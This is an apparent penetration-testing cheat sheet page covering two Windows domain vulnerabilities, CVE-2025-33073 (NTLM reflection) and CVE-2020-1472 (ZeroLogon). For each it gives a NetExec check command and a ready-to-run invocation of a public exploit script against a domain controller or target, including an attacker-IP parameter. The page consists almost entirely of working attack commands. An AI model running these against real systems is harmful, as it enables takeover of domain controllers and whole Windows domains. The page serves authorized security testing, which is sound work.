CVEs

CVE-2025-33073 (NTLM reflection)

# Check if vulnerable
nxc smb <DCS.TXT> -u <USERNAME> -p '<PASSWORD>' -M ntlm_reflection

# Get exploit script (https://github.com/mverschu/CVE-2025-33073)
python3 CVE-2025-33073.py -u '<FQDN>\<USERNAME>' -p <PASSWORD> --attacker-ip <IP> --dns-ip <IP> --dc-fqdn <FQDN> --target <FQDN TARGET> --target-ip <IP> --cli-only

CVE-2020-1472 (ZeroLogon)

# Check if vulnerable
nxc smb <TARGET> -u '' -p '' -M zerologon

# Get exploit script (https://github.com/dirkjanm/CVE-2020-1472)
python3 cve-2020-1472-exploit.py <FQDN TARGET> <IP TARGET>

PreviousNTLMv1 NextWebDAV WebClient

Last updated 23 days ago